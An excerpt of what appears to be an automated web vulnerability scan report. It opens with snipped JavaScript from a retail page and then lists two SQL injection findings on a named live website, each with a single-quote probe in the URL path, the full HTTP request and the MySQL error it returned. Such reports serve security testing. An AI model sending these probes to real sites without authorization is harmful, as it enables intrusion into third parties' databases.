<script language="JavaScript" type="text/javascript" src="http://answers.jcpenney.com/answers/1573/static/bazaarvoiceQA.js"></script>


<script language="JavaScript" src="Javascript/XGN.js?Version=11172010"></script>
<script language="JavaScript" src='Javascript/XBase.js?Version=11172010'></script>

<script language="javascript" type="text/javascript">
var XGN_QV_BUTTON_OFFSET = { left: 45, top: 151 };

function BVcheckLoadState()
{
}


function displayXGNQVButton(element, url)
{
if (XGNbrowser.MACOS && !XGNbrowser.MozBrowser){return;}

_qvButton = document.getElementById("QVButton");

if (_qvButton != null)
{
_qvButton.style.left = findXGNLeft(element) + element.width - _qvButton.width - XGN_QV_BUTTON_OFFSET.left + "px";
_qvButton.style.top = findXGNTop(element) + XGN_QV_BUTTON_OFFSET.top + "px";    
_qvButton.style.visibility = "visible";
_qvButton.onclick= function() {retrieveAndDisplayData("'" + url + "'");};
}
}

function hideXGNQVButton(e)
{
//not supporting Quickview for the MAC IE
if (XGNbrowser.MACOS && !XGNbrowser.MozBrowser){return;}

e = (e) ? e : ((window.event) ? window.event : null);
var toElement = null;

if (e != null)
{
toElement = e.relatedTarget || e.toElement;
}

if (_qvButton != null && _qvButton != toElement)
{
_qvButton.style.visibility = "hidden";
_qvButton = null;
}
}

function d
...[SNIP]...

1.160. http://xhtml.co.il/he/page-700/jQuery [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://xhtml.co.il
Path:   /he/page-700/jQuery

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /he/page-700'/jQuery HTTP/1.1
Host: xhtml.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:42:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.9
Pragma: public
Cache-Control: maxage=5184000
Expires: Tue, 17 May 2011 16:42:27 GMT
Set-Cookie: PHPSESSID=08faaa5e7173d902616a5a9a2333ceea; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 172

<!DOCTYPE html>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1

1.161. http://xhtml.co.il/ru/page-1013/jQuery.browser [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://xhtml.co.il
Path:   /ru/page-1013/jQuery.browser

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ru/page-1013'/jQuery.browser HTTP/1.1
Host: xhtml.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:43:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.9
Pragma: public
Cache-Control: maxage=5184000
Expires: Tue, 17 May 2011 16:43:20 GMT
Set-Cookie: PHPSESSID=16bb31dabadc089a279e6553a8dc85e7; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 172

<!DOCTYPE html>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1